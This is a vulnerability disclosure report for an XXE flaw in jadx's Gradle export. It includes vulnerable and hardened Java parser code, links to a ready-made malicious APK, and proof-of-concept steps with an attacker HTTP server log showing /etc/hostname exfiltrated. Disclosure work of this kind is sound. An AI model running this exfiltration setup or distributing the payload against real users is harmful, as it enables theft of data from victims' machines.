Improper Restriction of XML External Entity Reference in skylot/jadx
Jan 12th 2022
The parseXml() function in ExportGradleProject is not hardened against XXE: it does not set the disallow-doctype-decl feature on its DocumentBuilderFactory, so JADX is vulnerable to XXE when it parses a malicious AndroidManifest.xml while exporting an Android app to a Gradle project. In
    DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
    Document document = builder.parse(new InputSource(new StringReader(xmlContent)));
the DocumentBuilderFactory does not have the disallow-doctype-decl feature set to true, leaving the parser vulnerable to XXE.
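The weak configuration beside a hardened one, as an added example that is not jadx's own code: the first method is the snippet quoted above, the second sets disallow-doctype-decl plus the related Xerces/SAX features as defence in depth. The class name ManifestXxeCheck and the manifest string are constructed for illustration; the manifest uses only an internal entity, so the check runs offline.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class ManifestXxeCheck {
    // Vulnerable form, as quoted in the report: the default factory accepts
    // a DOCTYPE, so entity declarations (including external ones) are honoured.
    static Document parseXmlUnsafe(String xmlContent) throws Exception {
        DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        return builder.parse(new InputSource(new StringReader(xmlContent)));
    }

    // Hardened form: rejecting the DOCTYPE outright means no entity can be
    // declared at all; the remaining features are defence in depth for
    // parsers that do not support disallow-doctype-decl.
    static Document parseXmlSafe(String xmlContent) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xmlContent)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed manifest: a DOCTYPE with only an internal entity, which is
        // enough to show whether the parser honours a doctype at all (no network).
        String manifest = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE manifest [<!ENTITY pkg \"com.example.app\">]>\n"
            + "<manifest package=\"&pkg;\"/>";
        String pkg = parseXmlUnsafe(manifest).getDocumentElement().getAttribute("package");
        System.out.println("unsafe parser expanded the entity: package=" + pkg);
        try {
            parseXmlSafe(manifest);
            System.out.println("safe parser unexpectedly accepted the DOCTYPE");
        } catch (SAXParseException e) {
            System.out.println("safe parser rejected the DOCTYPE: " + e.getMessage());
        }
    }
}
```

With the JDK's built-in Xerces, the hardened parser throws a SAXParseException on the DOCTYPE line before any entity is processed, which is the behaviour the fix should produce for a crafted manifest.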
Proof Of Concept
1: Build an Android app with the following AndroidManifest.xml stored in it. You can use my built APK with a malicious AndroidManifest.xml file, https://drive.google.com/file/d/1D4QBk-YJH8xadGv1vpz9rBTDN9X43pUC/view?usp=sharing, in order to test this.
... [---malicious APK continued here---]
2: Open a new terminal and, in its working directory, create a file named malicious.dtd.
3: In the same terminal as step 2, start an HTTP server (standing in for the attacker's server) and leave it running:
➜ ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
4: Now export the APK to a Gradle project:
jadx -e /path/to/malicious/apkfile.apk
5: The HTTP server (standing in for the attacker's server) receives the contents of the victim's /etc/hostname:
➜ ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
...
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /malicious.dtd HTTP/1.1" 200 -
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /?x=testserver HTTP/1.1" 200 -
This vulnerability allows XXE-based information disclosure when a user is tricked into exporting a malicious Android app, carrying a crafted AndroidManifest.xml file, to Gradle.
If anyone viewing this report still wants to test it, I have moved the payload to GitHub: https://github.com/Haxatron/CVE-2022-0219/blob/main/payload.apk